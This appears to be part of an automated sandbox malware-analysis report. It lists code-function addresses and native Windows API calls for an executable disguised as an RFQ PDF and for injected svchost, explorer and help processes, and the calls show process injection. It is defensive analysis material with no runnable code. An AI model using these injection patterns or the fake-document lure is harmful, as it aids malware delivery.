          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03272CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,2_2_032735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_029DA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DA042 NtQueryInformationProcess,2_2_029DA042
          Source: C:\Windows\explorer.exeCode function: 3_2_087F9232 NtCreateFile,3_2_087F9232
          Source: C:\Windows\explorer.exeCode function: 3_2_087FAE12 NtProtectVirtualMemory,3_2_087FAE12
          Source: C:\Windows\explorer.exeCode function: 3_2_087FAE0A NtProtectVirtualMemory,3_2_087FAE0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532B60 NtClose,LdrInitializeThunk,5_2_03532B60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03532BF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03532BE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532AD0 NtReadFile,LdrInitializeThunk,5_2_03532AD0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532F30 NtCreateSection,LdrInitializeThunk,5_2_03532F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532FE0 NtCreateFile,LdrInitializeThunk,5_2_03532FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03532EA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03532D10
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532DD0 NtDelayExecution,LdrInitializeThunk,5_2_03532DD0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03532DF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03532C70
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532C60 NtCreateKey,LdrInitializeThunk,5_2_03532C60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03532CA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035335C0 NtCreateMutant,LdrInitializeThunk,5_2_035335C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03534340 NtSetContextThread,5_2_03534340
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03534650 NtSuspendThread,5_2_03534650
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532B80 NtQueryInformationFile,5_2_03532B80
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532BA0 NtEnumerateValueKey,5_2_03532BA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532AF0 NtWriteFile,5_2_03532AF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532AB0 NtWaitForSingleObject,5_2_03532AB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532F60 NtCreateProcessEx,5_2_03532F60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532F90 NtProtectVirtualMemory,5_2_03532F90
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532FB0 NtResumeThread,5_2_03532FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532FA0 NtQuerySection,5_2_03532FA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532E30 NtWriteVirtualMemory,5_2_03532E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532EE0 NtQueueApcThread,5_2_03532EE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532E80 NtReadVirtualMemory,5_2_03532E80
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532D00 NtSetInformationFile,5_2_03532D00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532D30 NtUnmapViewOfSection,5_2_03532D30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532DB0 NtEnumerateKey,5_2_03532DB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532C00 NtQueryInformationProcess,5_2_03532C00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532CC0 NtQueryVirtualMemory,5_2_03532CC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532CF0 NtOpenProcess,5_2_03532CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533010 NtOpenDirectoryObject,5_2_03533010
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533090 NtSetValueKey,5_2_03533090
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035339B0 NtGetContextThread,5_2_035339B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533D70 NtOpenThread,5_2_03533D70
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533D10 NtOpenProcessToken,5_2_03533D10
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA3E0 NtReadFile,5_2_02CCA3E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA330 NtCreateFile,5_2_02CCA330
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA460 NtClose,5_2_02CCA460
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA510 NtAllocateVirtualMemory,5_2_02CCA510
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA383 NtCreateFile,5_2_02CCA383
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA32C NtCreateFile,5_2_02CCA32C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA45A NtClose,5_2_02CCA45A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA58C NtAllocateVirtualMemory,5_2_02CCA58C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA58A NtAllocateVirtualMemory,5_2_02CCA58A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA50A NtAllocateVirtualMemory,5_2_02CCA50A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03269BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_03269BAF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0326A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_0326A036
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03269BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_03269BB2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0326A042 NtQueryInformationProcess,5_2_0326A042
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00AAD5EB
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00AA1201
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00AAE8F6
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A480600_2_00A48060
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB20460_2_00AB2046
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA82980_2_00AA8298
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A7E4FF0_2_00A7E4FF
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A7676B0_2_00A7676B
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AD48730_2_00AD4873
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A6CAA00_2_00A6CAA0
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A4CAF00_2_00A4CAF0
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A5CC390_2_00A5CC39
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A76DD90_2_00A76DD9
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A5D0640_2_00A5D064
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A491C00_2_00A491C0
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A5B1190_2_00A5B119
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A613940_2_00A61394
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A6781B0_2_00A6781B
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A479200_2_00A47920
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A5997D0_2_00A5997D
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A67A4A0_2_00A67A4A
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A67CA70_2_00A67CA7
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A79EEE0_2_00A79EEE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ACBE440_2_00ACBE44
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_0141F3000_2_0141F300
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EDDB2_2_0041EDDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E5C2_2_00409E5C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DF132_2_0041DF13
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E7A42_2_0041E7A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D2_2_032F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C2_2_0322D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA3522_2_032FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A2_2_0328739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F02_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033003E62_2_033003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E02742_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A02_2_032452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C02_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C02C02_2_032C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032301002_2_03230100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA1182_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327516C2_2_0327516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1722_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B16B2_2_0330B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C81582_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B02_2_0324B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033001AA2_2_033001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81CC2_2_032F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70E92_2_032F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF0E02_2_032FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF0CC2_2_032EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C02_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032407702_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032647502_2_03264750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF7B02_2_032FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C02_2_0323C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6E02_2_0325C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F16CC2_2_032F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032405352_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75712_2_032F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD5B02_2_032DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033005912_2_03300591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF43F2_2_032FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032314602_2_03231460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F24462_2_032F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE4F62_2_032EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB762_2_032FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB402_2_032FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FB802_2_0325FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B5BF02_2_032B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DBF92_2_0327DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6BD72_2_032F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B3A6C2_2_032B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA492_2_032FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7A462_2_032F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DDAAC2_2_032DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03285AA02_2_03285AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA802_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EDAC62_2_032EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032569622_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032499502_2_03249950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B9502_2_0325B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A02_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A9A62_2_0330A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD8002_2_032AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428402_2_03242840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A8402_2_0324A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268B82_2_032268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438E02_2_032438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8F02_2_0326E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282F282_2_03282F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260F302_2_03260F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF092_2_032FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4F402_2_032B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEFA02_2_032BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFFB12_2_032FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324CFE02_2_0324CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232FC82_2_03232FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEE262_2_032FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240E592_2_03240E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252E902_2_03252E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCE932_2_032FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEEDB2_2_032FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AD002_2_0324AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258DBF2_2_03258DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323ADE02_2_0323ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240C002_2_03240C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0CB52_2_032E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230CF22_2_03230CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DA0362_2_029DA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DB2322_2_029DB232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029D10822_2_029D1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DE5CD2_2_029DE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029D5B302_2_029D5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029D5B322_2_029D5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029D89122_2_029D8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029D2D022_2_029D2D02
          Source: C:\Windows\explorer.exeCode function: 3_2_087F92323_2_087F9232
          Source: C:\Windows\explorer.exeCode function: 3_2_087F80363_2_087F8036
          Source: C:\Windows\explorer.exeCode function: 3_2_087EF0823_2_087EF082
          Source: C:\Windows\explorer.exeCode function: 3_2_087F3B323_2_087F3B32
          Source: C:\Windows\explorer.exeCode function: 3_2_087F3B303_2_087F3B30
          Source: C:\Windows\explorer.exeCode function: 3_2_087F69123_2_087F6912
          Source: C:\Windows\explorer.exeCode function: 3_2_087F0D023_2_087F0D02
          Source: C:\Windows\explorer.exeCode function: 3_2_087FC5CD3_2_087FC5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_1097C0823_2_1097C082
          Source: C:\Windows\explorer.exeCode function: 3_2_109850363_2_10985036
          Source: C:\Windows\explorer.exeCode function: 3_2_109895CD3_2_109895CD
          Source: C:\Windows\explorer.exeCode function: 3_2_109839123_2_10983912
          Source: C:\Windows\explorer.exeCode function: 3_2_1097DD023_2_1097DD02
          Source: C:\Windows\explorer.exeCode function: 3_2_109862323_2_10986232
          Source: C:\Windows\explorer.exeCode function: 3_2_10980B303_2_10980B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10980B323_2_10980B32
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BA3525_2_035BA352
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0350E3F05_2_0350E3F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035C03E65_2_035C03E6
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035A02745_2_035A0274
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035802C05_2_035802C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035881585_2_03588158
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0359A1185_2_0359A118
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034F01005_2_034F0100
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B81CC5_2_035B81CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035C01AA5_2_035C01AA
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B41A25_2_035B41A2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035920005_2_03592000
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035247505_2_03524750
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035007705_2_03500770
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034FC7C05_2_034FC7C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0351C6E05_2_0351C6E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035005355_2_03500535
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035C05915_2_035C0591
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B24465_2_035B2446
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035A44205_2_035A4420
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035AE4F65_2_035AE4F6
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BAB405_2_035BAB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B6BD75_2_035B6BD7
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034FEA805_2_034FEA80
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035169625_2_03516962
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035029A05_2_035029A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035CA9A65_2_035CA9A6
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0350A8405_2_0350A840
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035028405_2_03502840
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0352E8F05_2_0352E8F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034E68B85_2_034E68B8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03574F405_2_03574F40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03520F305_2_03520F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035A2F305_2_035A2F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03542F285_2_03542F28
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034F2FC85_2_034F2FC8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0350CFE05_2_0350CFE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0357EFA05_2_0357EFA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03500E595_2_03500E59
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BEE265_2_035BEE26
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BEEDB5_2_035BEEDB
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03512E905_2_03512E90
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BCE935_2_035BCE93
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0359CD1F5_2_0359CD1F
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0350AD005_2_0350AD00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034FADE05_2_034FADE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03518DBF5_2_03518DBF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03500C005_2_03500C00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034F0CF25_2_034F0CF2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035A0CB55_2_035A0CB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034ED34C5_2_034ED34C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B132D5_2_035B132D
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0354739A5_2_0354739A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0351B2C05_2_0351B2C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035A12ED5_2_035A12ED
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035052A05_2_035052A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035CB16B5_2_035CB16B
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034EF1725_2_034EF172
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0353516C5_2_0353516C
